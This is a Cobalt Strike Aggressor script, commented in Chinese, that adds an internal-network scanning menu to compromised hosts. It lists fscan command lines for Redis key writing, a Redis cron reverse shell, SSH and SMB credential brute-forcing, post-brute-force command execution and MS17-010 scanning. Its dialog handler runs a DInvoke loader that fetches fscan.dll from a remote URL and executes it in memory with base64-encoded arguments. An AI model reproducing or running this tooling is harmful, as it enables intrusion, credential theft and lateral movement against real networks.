include(script_resource("config.cna"));

menu "☆ 内网扫描" {

    item "运行 Fscan" {
        blog($1, "\c9=========== 运行 Fscan ==========");
        $bid = $1['@'];
        btask($bid, "fscan.exe -h 192.168.1.1/24 -np -no -nopoc                     (跳过存活检测、不保存文件、跳过web poc扫描)", "");            
        btask($bid, "fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub                     (redis 写公钥)", "");
        btask($bid, "fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666               (redis 计划任务反弹shell)", "");
        btask($bid, "fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt     (加载指定文件的用户名、密码来进行爆破)", "");
        btask($bid, "fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt                      (指定扫描结果保存路径,默认保存在当前路径)", "");
        btask($bid, "fscan.exe -h 192.168.1.1/8                                     (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息)", "");
        btask($bid, "fscan.exe -h 192.168.1.1/24 -m smb -pwd password               (smb密码碰撞)", "");
        btask($bid, "fscan.exe -h 192.168.1.1/24 -c whoami                          (ssh 爆破成功后，命令执行)", "");
        btask($bid, "fscan.exe -h 192.168.1.1/24 -m ssh -p 2222                     (指定模块ssh和端口)", "");
        btask($bid, "fscan.exe -h 192.168.1.1/24 -m ms17010                         (指定模块)", "");
        btask($bid, "fscan.exe -h 192.0.0.0/8 -m icmp                               (探测每个C段的网关和数个随机IP,并统计top 10 B、C段存活数量)", "");

        # 创建对话框，设置默认参数
        $Dialog = dialog("运行fscan", %(iprange => "192.168.1.0/24", cmdparams => "-no", bid => $bid), &run_fscan);

        # 设置对话框描述
        dialog_description($Dialog, "请在下方输入运行指令：");

        # 添加 IP 段输入框，默认值为 192.168.1.0/24
        drow_text($Dialog, "iprange", "IP 段: ");
        
        # 添加命令行参数输入框，默认值为 -no
        drow_text($Dialog, "cmdparams", "命令行参数: ");

        # 添加运行按钮
        dbutton_action($Dialog, "运行");

        # 显示对话框
        dialog_show($Dialog);
    }
}

sub run_fscan {
    local('$iprange $cmdparams $exe $param');
    $iprange = $3['iprange'];
    $cmdparams = $3['cmdparams'];
    $b64 = base64_encode("-h $iprange $cmdparams");

    # 打印日志
    #blog($3['bid'], "\c9正在运行 fscan 扫描...");

    # 构建执行命令
    $exe = script_resource("/scripts/DInvoke.exe");
    $param = "--url " . $url . "/IntrScan/x64/fscan.dll --config " . $b64;

    # 打印最终执行的命令
    #blog2($bid, "最终执行的命令: $exe $param");

    # 执行命令
    bexecute_assembly!($bid, $exe, $param);

}
